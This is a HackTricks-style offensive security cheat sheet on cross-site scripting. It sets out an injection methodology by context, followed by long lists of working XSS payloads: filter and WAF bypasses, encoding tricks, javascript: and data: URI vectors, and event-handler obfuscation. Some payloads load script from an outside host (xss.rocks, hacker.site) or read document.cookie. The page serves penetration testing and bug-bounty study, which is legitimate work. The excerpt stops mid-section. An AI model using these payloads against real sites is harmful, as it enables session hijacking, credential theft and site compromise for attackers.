HackTricks
Search…
🤩
Generic Methodologies & Resources
🐧
Linux Hardening
🍏
MacOS Hardening
🪟
Windows Hardening
📱
Mobile Pentesting
👽
Network Services Pentesting
🕸
Pentesting Web
⛈
Cloud Security
😎
Hardware/Physical Access
🦅
Reversing & Exploiting
🔮
Crypto & Stego
🧐
External Platforms Reviews/Writeups
✍
TODO
XSS (Cross Site Scripting)
XSS (Cross Site Scripting)
Support HackTricks and get benefits!
.png?alt=media)
Bug bounty tip: sign up for Intigriti, a premium bug bounty platform created by hackers, for hackers! Join us at https://go.intigriti.com/hacktricks today, and start earning bounties up to $100,000!
Register - Intigriti
Register - Intigriti
Methodology
- 1.Check if any value you control (parameters, path, headers?, cookies?) is being reflected in the HTML or used by JS code.
- 2.Find the context where it's reflected/used.
- 3.If reflected
- 1.Check which symbols can you use and depending on that, prepare the payload:
- 1.In raw HTML:
- 1.Can you create new HTML tags?
- 2.Can you use events or attributes supporting
javascript:protocol? - 3.Can you bypass protections?
- 4.Is the HTML content being interpreted by any client side JS engine (AngularJS, VueJS, Mavo...), you could abuse a Client Side Template Injection.
- 5.If you cannot create HTML tags that execute JS code, could you abuse a Dangling Markup - HTML scriptless injection?
- 2.Inside a HTML tag:
- 1.Can you exit to raw HTML context?
- 2.Can you create new events/attributes to execute JS code?
- 3.Does the attribute where you are trapped support JS execution?
- 4.Can you bypass protections?
- 3.Inside JavaScript code:
- 1.Can you escape the
<script>tag? - 2.Can you escape the string and execute different JS code?
- 3.Are your input in template literals ``?
- 4.Can you bypass protections?
- 4.Javascript function being executed
- 1.You can indicate the name of the function to execute. e.g.:
?callback=alert(1)
- 4.If used:
- 1.You could exploit a DOM XSS, pay attention how your input is controlled and if your controlled input is used by any sink.
When working on a complex XSS you might find interesting to know about:
Reflected values
In order to successfully exploit a XSS the first thing you need to find is a value controlled by you that is being reflected in the web page.
- Intermediately reflected: If you find that the value of a parameter or even the path is being reflected in the web page you could exploit a Reflected XSS.
- Stored and reflected: If you find that a value controlled by you is saved in the server and is reflected every time you access a page you could exploit a Stored XSS.
- Accessed via JS: If you find that a value controlled by you is being access using JS you could exploit a DOM XSS.
Contexts
When trying to exploit a XSS the first thing you need to know if where is your input being reflected. Depending on the context, you will be able to execute arbitrary JS code on different ways.
Raw HTML
If your input is reflected on the raw HTML page you will need to abuse some HTML tag in order to execute JS code:
<img , <iframe , <svg , <script ... these are just some of the many possible HTML tags you could use.
Also, keep in mind Client Side Template Injection.Inside HTML tags attribute
If your input is reflected inside the value of the attribute of a tag you could try:
- 1.To escape from the attribute and from the tag (then you will be in the raw HTML) and create new HTML tag to abuse:
"><img [...] - 2.If you can escape from the attribute but not from the tag (
>is encoded or deleted), depending on the tag you could create an event that executes JS code:" autofocus onfocus=alert(1) x=" - 3.If you cannot escape from the attribute (
"is being encoded or deleted), then depending on which attribute your value is being reflected in if you control all the value or just a part you will be able to abuse it. For example, if you control an event likeonclick=you will be able to make it execute arbitrary code when it's clicked. Another interesting example is the attributehref, where you can use thejavascript:protocol to execute arbitrary code:href="javascript:alert(1)" - 4.If your input is reflected inside "unexpoitable tags" you could try the
accesskeytrick to abuse the vuln (you will need some kind of social engineer to exploit this):" accesskey="x" onclick="alert(1)" x="
Inside JavaScript code
In this case your input is reflected between
<script> [...] </script> tags of a HTML page, inside a .js file or inside an attribute using javascript: protocol:- If reflected between
<script> [...] </script>tags, even if your input if inside any kind of quotes, you can try to inject</script>and escape from this context. This works because the browser will first parse the HTML tags and then the content, therefore, it won't notice that your injected</script>tag is inside the HTML code. - If reflected inside a JS string and the last trick isn't working you would need to exit the string, execute your code and reconstruct the JS code (if there is any error, it won't be executed:
'-alert(1)-'';-alert(1)//\';alert(1)//
- If reflected inside template literals you can embed JS expressions using
${ ... }syntax:var greetings = `Hello, ${alert(1)}`
Javascript Hoisting
Javascript Hoisting references the opportunity to declare functions, variables or classes after they are used.
Therefore if you have scenarios where you can Inject JS code after an undeclared object is used, you could fix the syntax by declaring it (so your code gets executed instead of throwing an error):
1
// The function vulnerableFunction is not defined
2
vulnerableFunction('test', '<INJECTION>');
3
// You can define it in your injection to execute JS
4
//Payload1: param='-alert(1)-'')%3b+function+vulnerableFunction(a,b){return+1}%3b
5
'-alert(1)-''); function vulnerableFunction(a,b){return 1};
6
7
//Payload2: param=test')%3bfunction+vulnerableFunction(a,b){return+1}%3balert(1)
8
test'); function vulnerableFunction(a,b){ return 1 };alert(1)
Copied!
1
// If a variable is not defined, you could define it in the injection
2
// In the following example var a is not defined
3
function myFunction(a,b){
4
return 1
5
};
6
myFunction(a, '<INJECTION>')
7
8
//Payload: param=test')%3b+var+a+%3d+1%3b+alert(1)%3b
9
test'); var a = 1; alert(1);
Copied!
1
// If an undeclared class is used, you cannot declare it AFTER being used
2
var variable = new unexploitableClass();
3
<INJECTION>
4
// But you can actually declare it as a function, being able to fix the syntax with something like:
5
function unexploitableClass() {
6
return 1;
7
}
8
alert(1);
Copied!
1
// Properties are not hoisted
2
// So the following examples where the 'cookie' attribute doesn´t exist
3
// cannot be fixed if you can only inject after that code:
4
test.cookie('leo','INJECTION')
5
test['cookie','injection']
Copied!
For more info about Javascript Hoisting check: https://jlajara.gitlab.io/Javascript_Hoisting_in_XSS_Scenarios
Javascript Function
Several web pages have endpoints that accept as parameter the name of the function to execute. A common example to see in the wild is something like:
?callback=callbackFunc.A good way to find out if something given directly by the user is trying to be executed is modifying the param value (for example to 'Vulnerable') and looking in the console for errors like:
In case it's vulnerable, you could be able to trigger an alert just doing sending the value:
?callback=alert(1). However, it' very common that this endpoints will validate the content to only allow letters, numbers, dots and underscores ([\w\._]).However, even with that limitation it's still possible to perform some actions. This is because you can use that valid chars to access any element in the DOM:
Some useful functions for this:
1
firstElementChild
2
lastElementChild
3
nextElementSibiling
4
lastElementSibiling
5
parentElement
Copied!
You can also try to trigger Javascript functions directly:
obj.sales.delOrders.However, usually the endpoints executing the indicated function are endpoints without much interesting DOM, other pages in the same origin will have a more interesting DOM to perform more actions.
Therefore, in order to abuse this vulnerability in a different DOM the Same Origin Method Execution (SOME) exploitation was developed:
DOM
There is JS code that is using unsafely some data controlled by an attacker like
location.href . An attacker, could abuse this to execute arbitrary JS code.Universal XSS
These kind of XSS can be found anywhere. They not depend just on the client exploitation of a web application but on any context. These kind of arbitrary JavaScript execution can even be abuse to obtain RCE, read arbitrary files in clients and servers, and more.
Some examples:
WAF bypass encoding image
from https://twitter.com/hackerscrolls/status/1273254212546281473?s=21
Injecting inside raw HTML
When your input is reflected inside the HTML page or you can escape and inject HTML code in this context the first thing you need to do if check if you can abuse
< to create new tags: Just try to reflect that char and check if it's being HTML encoded or deleted of if it is reflected without changes. Only in the last case you will be able to exploit this case.
For this cases also keep in mind Client Side Template Injection.
Note: A HTML comment can be closed using --> or --!>In this case and if no black/whitelisting is used, you could use payloads like:
1
<script>alert(1)</script>
2
<img src=x onerror=alert(1) />
3
<svg onload=alert('XSS')>
Copied!
But, if tags/attributes black/whitelisting is being used, you will need to brute-force which tags you can create.
Once you have located which tags are allowed, you would need to brute-force attributes/events inside the found valid tags to see how you can attack the context.
Tags/Events brute-force
Go to https://portswigger.net/web-security/cross-site-scripting/cheat-sheet and click on Copy tags to clipboard. Then, send all of them using Burp intruder and check if any tags wasn't discovered as malicious by the WAF. Once you have discovered which tags you can use, you can brute force all the events using the valid tags (in the same web page click on Copy events to clipboard and follow the same procedure as before).
Custom tags
If you didn't find any valid HTML tag, you could try to create a custom tag and and execute JS code with the
onfocus attribute. In the XSS request, you need to end the URL with # to make the page focus on that object and execute the code:1
/?search=<xss+id%3dx+onfocus%3dalert(document.cookie)+tabindex%3d1>#x
Copied!
Blacklist Bypasses
If some kind of blacklist is being used you could try to bypass it with some silly tricks:
1
//Random capitalization
2
<script> --> <ScrIpT>
3
<img --> <ImG
4
5
//Double tag, in case just the first match is removed
6
<script><script>
7
<scr<script>ipt>
8
<SCRscriptIPT>alert(1)</SCRscriptIPT>
9
10
//You can substitude the space to separate attributes for:
11
/
12
/*%00/
13
/%00*/
14
%2F
15
%0D
16
%0C
17
%0A
18
%09
19
20
//Unexpected parent tags
21
<svg><x><script>alert('1')</x>
22
23
//Unexpected weird attributes
24
<script x>
25
<script a="1234">
26
<script ~~~>
27
<script/random>alert(1)</script>
28
<script ///Note the newline
29
>alert(1)</script>
30
<scr\x00ipt>alert(1)</scr\x00ipt>
31
32
//Not closing tag, ending with " <" or " //"
33
<iframe SRC="javascript:alert('XSS');" <
34
<iframe SRC="javascript:alert('XSS');" //
35
36
//Extra open
37
<<script>alert("XSS");//<</script>
38
39
//Just weird an unexpected, use your imagination
40
<</script/script><script>
41
<input type=image src onerror="prompt(1)">
42
43
//Using `` instead of parenthesis
44
onerror=alert`1`
45
46
//Use more than one
47
<<TexTArEa/*%00//%00*/a="not"/*%00///AutOFocUs////onFoCUS=alert`1` //
Copied!
Length bypass (small XSSs)
1
<!-- Taken from the blog of Jorge Lajara -->
2
<svg/onload=alert``>
3
<script src=//aa.es>
4
<script src=//℡㏛.pw>
Copied!
Click XSS - Clickjacking
If in order to exploit the vulnerability you need the user to click a link or a form with prepopulated data you could try to abuse Clickjacking (if the page is vulnerable).
Impossible - Dangling Markup
If you just think that it's impossible to create an HTML tag with an attribute to execute JS code, you should check Danglig Markup because you could exploit the vulnerability without executing JS code.
Injecting inside HTML tag
Inside the tag/escaping from attribute value
If you are in inside a HTML tag, the first thing you could try is to escape from the tag and use some of the techniques mentioned in the previous section to execute JS code.
If you cannot escape from the tag, you could create new attributes inside the tag to try to execute JS code, for example using some payload like (note that in this example double quotes are use to escape from the attribute, you won't need them if your input is reflected directly inside the tag):
1
" autofocus onfocus=alert(document.domain) x="
2
" onfocus=alert(1) id=x tabindex=0 style=display:block>#x #Access http://site.com/?#x t
Copied!
Style events
1
<p style="animation: x;" onanimationstart="alert()">XSS</p>
2
<p style="animation: x;" onanimationend="alert()">XSS</p>
3
4
#ayload that injects an invisible overlay that will trigger a payload if anywhere on the page is clicked:
5
<div style="position:fixed;top:0;right:0;bottom:0;left:0;background: rgba(0, 0, 0, 0.5);z-index: 5000;" onclick="alert(1)"></div>
6
#moving your mouse anywhere over the page (0-click-ish):
7
<div style="position:fixed;top:0;right:0;bottom:0;left:0;background: rgba(0, 0, 0, 0.0);z-index: 5000;" onmouseover="alert(1)"></div>
Copied!
Within the attribute
Even if you cannot escape from the attribute (
" is being encoded or deleted), depending on which attribute your value is being reflected in if you control all the value or just a part you will be able to abuse it. For example, if you control an event like onclick= you will be able to make it execute arbitrary code when it's clicked.
Another interesting example is the attribute href, where you can use the javascript: protocol to execute arbitrary code: href="javascript:alert(1)"Bypass inside event using HTML encoding/URL encode
The HTML encoded characters inside the value of HTML tags attributes are decoded on runtime. Therefore something like the following will be valid (the payload is in bold):
<a id="author" href="http://none" onclick="var tracker='http://foo?'-alert(1)-'';">Go Back </a>Note that any kind of HTML encode is valid:
1
//HTML entities
2
'-alert(1)-'
3
//HTML hex without zeros
4
'-alert(1)-'
5
//HTML hex with zeros
6
'-alert(1)-'
7
//HTML dec without zeros
8
'-alert(1)-'
9
//HTML dec with zeros
10
'-alert(1)-'
11
12
<a href="javascript:var a=''-alert(1)-''">
Copied!
Note that URL encode will also work:
1
<a href="https://example.com/lol%22onmouseover=%22prompt(1);%20img.png">Click</a>
Copied!
Bypass inside event using Unicode encode
1
//For some reason you can use unicode to encode "alert" but not "(1)"
2
<img src onerror=\u0061\u006C\u0065\u0072\u0074(1) />
3
<img src onerror=\u{61}\u{6C}\u{65}\u{72}\u{74}(1) />
Copied!
Special Protocols Within the attribute
There you can use the protocols
javascript: or data: in some places to execute arbitrary JS code. Some will require user interaction on some won't.1
javascript:alert(1)
2
JavaSCript:alert(1)
3
javascript:%61%6c%65%72%74%28%31%29 //URL encode
4
javascript:alert(1)
5
javascript:alert(1)
6
javascript:alert(1)
7
javascriptΪlert(1)
8
java //Note the new line
9
script:alert(1)
10
11
data:text/html,<script>alert(1)</script>
12
DaTa:text/html,<script>alert(1)</script>
13
data:text/html;charset=iso-8859-7,%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e
14
data:text/html;charset=UTF-8,<script>alert(1)</script>
15
data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=
16
data:text/html;charset=thing;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg
17
data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==
Copied!
Places where you can inject these protocols
In general the
javascript: protocol can be used in any tag that accepts the attribute href and in most of the tags that accepts the attribute src (but not <img)1
<a href="javascript:alert(1)">
2
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">
3
<form action="javascript:alert(1)"><button>send</button></form>
4
<form id=x></form><button form="x" formaction="javascript:alert(1)">send</button>
5
<object data=javascript:alert(3)>
6
<iframe src=javascript:alert(2)>
7
<embed src=javascript:alert(1)>
8
9
<object data="data:text/html,<script>alert(5)</script>">
10
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+" type="image/svg+xml" AllowScriptAccess="always"></embed>
11
<embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="></embed>
12
<iframe src="data:text/html,<script>alert(5)</script>"></iframe>
13
14
//Special cases
15
<object data="//hacker.site/xss.swf"> .//https://github.com/evilcos/xss.swf
16
<embed code="//hacker.site/xss.swf" allowscriptaccess=always> //https://github.com/evilcos/xss.swf
17
<iframe srcdoc="<svg onload=alert(4);>">
Copied!
Other obfuscation tricks
In this case the HTML encoding and the Unicode encoding trick from the previous section is also valid as you are inside an attribute.
1
<a href="javascript:var a=''-alert(1)-''">
Copied!
Moreover, there is another nice trick for these cases**: Even if your input inside
javascript:... is being URL encoded, it will be URL decoded before it's executed.** So, if you need to escape from the string using a single quote and you see that it's being URL encoded, remember that it doesn't matter, it will be interpreted as a single quote during the execution time.1
'-alert(1)-'
2
%27-alert(1)-%27
3
<iframe src=javascript:%61%6c%65%72%74%28%31%29></iframe>
Copied!
Note that if you try to use both
URLencode + HTMLencode in any order to encode the payload it won't work, but you can mix them inside the payload.Using Hex and Octal encode with
javascript:You can use Hex and Octal encode inside the
src attribute of iframe (at least) to declare HTML tags to execute JS:1
//Encoded: <svg onload=alert(1)>
2
// This WORKS
3
<iframe src=javascript:'\x3c\x73\x76\x67\x20\x6f\x6e\x6c\x6f\x61\x64\x3d\x61\x6c\x65\x72\x74\x28\x31\x29\x3e' />
4
<iframe src=javascript:'\74\163\166\147\40\157\156\154\157\141\144\75\141\154\145\162\164\50\61\51\76' />
5
6
//Encoded: alert(1)
7
// This doesn't work
8
<svg onload=javascript:'\x61\x6c\x65\x72\x74\x28\x31\x29' />
9
<svg onload=javascript:'\141\154\145\162\164\50\61\51' />
Copied!
Reverse tab nabbing
1
<a target="_blank" rel="opener"
Copied!
If you can inject any URL in an arbitrary
<a href= tag that contains the target="_blank" and rel="opener" attributes, check the following page to exploit this behavior:on Event Handlers Bypass
First of all check this page (https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) for useful "on" event handlers.
In case there is some blacklist preventing you from creating this even handlers you can try the following bypasses:
1
<svg onload%09=alert(1)> //No safari
2
<svg %09onload=alert(1)>
3
<svg %09onload%20=alert(1)>
4
<svg onload%09%20%28%2c%3b=alert(1)>
5
6
//chars allowed between the onevent and the "="
7
IExplorer: %09 %0B %0C %020 %3B
8
Chrome: %09 %20 %28 %2C %3B
9
Safari: %2C %3B
10
Firefox: %09 %20 %28 %2C %3B
11
Opera: %09 %20 %2C %3B
12
Android: %09 %20 %28 %2C %3B
Copied!
XSS in "Unexploitable tags" (input hidden, link, canonical)
From here:
You can execute an XSS payload inside a hidden attribute, provided you can persuade the victim into pressing the key combination. On Firefox Windows/Linux the key combination is ALT+SHIFT+X and on OS X it is CTRL+ALT+X. You can specify a different key combination using a different key in the access key attribute. Here is the vector:
1
<input type="hidden" accesskey="X" onclick="alert(1)">
Copied!
The XSS payload will be something like this:
" accesskey="x" onclick="alert(1)" x="Blacklist Bypasses
Several tricks with using different encoding were exposed already inside this section. Go back to learn where can you use HTML encoding, Unicode encoding, URL encoding, Hex and Octal encoding and even data encoding.
Bypasses for HTML tags and attributes
Bypasses for JavaScript code
CSS-Gadgets
If you found a XSS in a very small part of the web that requires some kind of interaction (maybe a small link in the footer with an onmouseover element), you can try to modify the space that element occupies to maximize the probabilities of have the link fired.
For example, you could add some styling in the element like:
position: fixed; top: 0; left: 0; width: 100%; height: 100%; background-color: red; opacity: 0.5But, if the WAF is filtering the style attribute, you can use CSS Styling Gadgets, so if you find, for example
.test {display:block; color: blue; width: 100%}
and
#someid {top: 0; font-family: Tahoma;}
Now you can modify our link and bring it to the form
<a href=”” id=someid class=test onclick=alert() a=””>
Injecting inside JavaScript code
In these case you input is going to be reflected inside the JS code of a
.js file or between <script>...</script> tags or between HTML events that can execute JS code or between attributes that accepts the javascript: protocol.Escaping <script> tag
If your code is inserted within
<script> [...] var input = 'reflected data' [...] </script> you could easily escape closing the <script> tag:1
</script><img src=1 onerror=alert(document.domain)>
Copied!
Note that in this example we haven't even closed the single quote, but that's not necessary as the browser first performs HTML parsing to identify the page elements including blocks of script, and only later performs JavaScript parsing to understand and execute the embedded scripts.
Inside JS code
If
<> are being sanitised you can still escape the string where your input is being located and execute arbitrary JS. It's important to fix JS syntax, because if there are any errors, the JS code won't be executed:1
'-alert(document.domain)-'
2
';alert(document.domain)//
3
\';alert(document.domain)//
Copied!
Template literals ``
In order to construct strings apart from single and double quotes JS also accepts backticks
`` . This is known as template literals as they allow to embedded JS expressions using ${ ... } syntax.
Therefore, if you find that your input is being reflected inside a JS string that is using backticks, you can abuse the syntax ${ ... } to execute arbitrary JS code:This can be abused using:
${alert(1)}Encoded code execution
1
<script>\u0061lert(1)</script>
2
<svg><script>alert('1')
3
<svg><script>alert(1)</script></svg> <!-- The svg tags are neccesary
4
<iframe srcdoc="<SCRIPT>alert(1)</iframe>">
Copied!
JavaScript bypass blacklists techniques
Strings
1
"thisisastring"
2
'thisisastrig'
3
`thisisastring`
4
/thisisastring/ == "/thisisastring/"
5
/thisisastring/.source == "thisisastring"
6
String.fromCharCode(116,104,105,115,105,115,97,115,116,114,105,110,103)
7
"\x74\x68\x69\x73\x69\x73\x61\x73\x74\x72\x69\x6e\x67"
8
"\164\150\151\163\151\163\141\163\164\162\151\156\147"
9
"\u0074\u0068\u0069\u0073\u0069\u0073\u0061\u0073\u0074\u0072\u0069\u006e\u0067"
10
"\u{74}\u{68}\u{69}\u{73}\u{69}\u{73}\u{61}\u{73}\u{74}\u{72}\u{69}\u{6e}\u{67}"
11
"\a\l\ert\(1\)"
12
atob("dGhpc2lzYXN0cmluZw==")
13
eval(8680439..toString(30))(983801..toString(36))
Copied!
Space substitutions inside JS code
1
<TAB>
2
/**/
Copied!
JavaScript without parentheses
1
alert`1`
2
<img src=x onerror="window.onerror=eval;throw'=alert\x281\x29'">
3
eval.call`${'alert\x2823\x29'}`
4
eval.apply`${[`alert\x2823\x29`]}`
Copied!
1
//This is a 1 line comment
2
/* This is a multiline comment*/
3
#!This is a 1 line comment, but "#!" must to be at the beggining of the line
4
-->This is a 1 line comment, but "-->" must to be at the beggining of the line
Copied!
1
//Javascript interpret as new line these chars:
2
String.fromCharCode(10) //0x0a
3
String.fromCharCode(13) //0x0d
4
String.fromCharCode(8232) //0xe2 0x80 0xa8
5
String.fromCharCode(8233) //0xe2 0x80 0xa8
Copied!
Arbitrary function (alert) call
1
//Eval like functions
2
eval('ale'+'rt(1)')
3
setTimeout('ale'+'rt(2)');
4
setInterval('ale'+'rt(10)');
5
Function('ale'+'rt(10)')``;
6
[].constructor.constructor("alert(document.domain)")``
7
[]["constructor"]["constructor"]`$${alert()}```
8
9
//General function executions
10
`` //Can be use as parenthesis
11
alert`document.cookie`
12
alert(document['cookie'])
13
with(document)alert(cookie)
14
(alert)(1)
15
(alert(1))in"."
16
a=alert,a(1)
17
[1].find(alert)
18
window['alert'](0)
19
parent['alert'](1)
20
self['alert'](2)
21
top['alert'](3)
22
this['alert'](4)
23
frames['alert'](5)
24
content['alert'](6)
25
[7].map(alert)
26
[8].find(alert)
27
[9].every(alert)
28
[10].filter(alert)
29
[11].findIndex(alert)
30
[12].forEach(alert);
31
top[/al/.source+/ert/.source](1)
32
top[8680439..toString(30)](1)
33
Function("ale"+"rt(1)")();
34
new Function`al\ert\`6\``;
35
Set.constructor('ale'+'rt(13)')();
36
Set.constructor`al\x65rt\x2814\x29```;
37
$='e'; x='ev'+'al'; x=this[x]; y='al'+$+'rt(1)'; y=x(y); x(y)
38
x='ev'+'al'; x=this[x]; y='ale'+'rt(1)'; x(x(y))
39
this[[]+('eva')+(/x/,new Array)+'l'](/xxx.xxx.xxx.xxx.xx/+alert(1),new Array)
40
globalThis[`al`+/ert/.source]`1`
41
this[`al`+/ert/.source]`1`
42
[alert][0].call(this,1)
43
window['a'+'l'+'e'+'r'+'t']()
44
window['a'+'l'+'e'+'r'+'t'].call(this,1)
45
top['a'+'l'+'e'+'r'+'t'].apply(this,[1])
46
(1,2,3,4,5,6,7,8,alert)(1)
47
x=alert,x(1)
48
[1].find(alert)
49
top["al"+"ert"](1)
50
top[/al/.source+/ert/.source](1)
51
al\u0065rt(1)
52
al\u0065rt`1`
53
top['al\145rt'](1)
54
top['al\x65rt'](1)
55
top[8680439..toString(30)](1)
56
<svg><animate onbegin=alert() attributeName=x></svg>
Copied!
DOM vulnerabilities
There is JS code that is using unsafely data controlled by an attacker like
location.href . An attacker, could abuse this to execute arbitrary JS code.
Due to the extension of the explanation of DOM vulnerabilities it was moved to this page:There you will find a detailed explanation of what DOM vulnerabilities are, how are they provoked, and how to exploit them.
Also, don't forget that at the end of the mentioned post you can find an explanation about DOM Clobbering attacks.
Other Bypasses
Normalised Unicode
You could check is the reflected values are being unicode normalized in the server (or in the client side) and abuse this functionality to bypass protections. Find an example here.
PHP FILTER_VALIDATE_EMAIL flag Bypass
1
"><svg/onload=confirm(1)>"@x.y
Copied!
Ruby-On-Rails bypass
Due to RoR mass assignment quotes are inserted in the HTML and then the quote restriction is bypassed and additoinal fields (onfocus) can be added inside the tag.
Form example (from this report), if you send the payload:
1
contact[email] onfocus=javascript:alert('xss') autofocus a=a&form_type[a]aaa
Copied!
The pair "Key","Value" will be echoed back like this:
1
{" onfocus=javascript:alert('xss') autofocus a"=>"a"}
Copied!
Then, the onfocus attribute will be inserted:
A XSS occurs.
Special combinations
1
<iframe/src="data:text/html,<svg onload=alert(1)>">
2
<input type=image src onerror="prompt(1)">
3
<svg onload=alert(1)//
4
<img src="/" =_=" title="onerror='prompt(1)'">
5
<img src='1' onerror='alert(0)' <
6
<script x> alert(1) </script 1=2
7
<script x>alert('XSS')<script y>
8
<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//
9
<svg////////onload=alert(1)>
10
<svg id=x;onload=alert(1)>
11
<svg id=`x`onload=alert(1)>
12
<img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
13
<script>$=1,alert($)</script>
14
<script ~~~>confirm(1)</script ~~~>
15
<script>$=1,\u0061lert($)</script>
16
<</script/script><script>eval('\\u'+'0061'+'lert(1)')//</script>
17
<</script/script><script ~~~>\u0061lert(1)</script ~~~>
18
</style></scRipt><scRipt>alert(1)</scRipt>
19
<img src=x:prompt(eval(alt)) onerror=eval(src) alt=String.fromCharCode(88,83,83)>
20
<svg><x><script>alert('1')</x>
21
<iframe src=""/srcdoc='<svg onload=alert(1)>'>
22
<svg><animate onbegin=alert() attributeName=x></svg>
23
<img/id="alert('XSS')\"/alt=\"/\"src=\"/\"onerror=eval(id)>
24
<img src=1 onerror="s=document.createElement('script');s.src='http://xss.rocks/xss.js';document.body.appendChild(s);"
Copied!
XSS with header injection in a 302 response
If you find that you can inject headers in a 302 Redirect response you could try to make the browser execute arbitrary JavaScript. This is not trivial as modern browsers do not interpret the HTTP response body if the HTTP response status code is a 302, so just a cross-site scripting payload is useless.
In this report and this one you can read how you can test several protocols inside the Location header and see if any of them allows the browser to inspect and execute the XSS payload inside the body.
Past known protocols:
mailto://, //x:1/, ws://, wss://, empty Location header, resource://.Only Letters, Numbers and Dots
If you are able to indicate the callback that javascript is going to execute limited to those chars. Read this section of this post to find how to abuse this behaviour.
XS Jails
If you are only have a limited set of chars to use, check these other valid solutions for XSJail problems:
1
// eval + unescape + regex
2
eval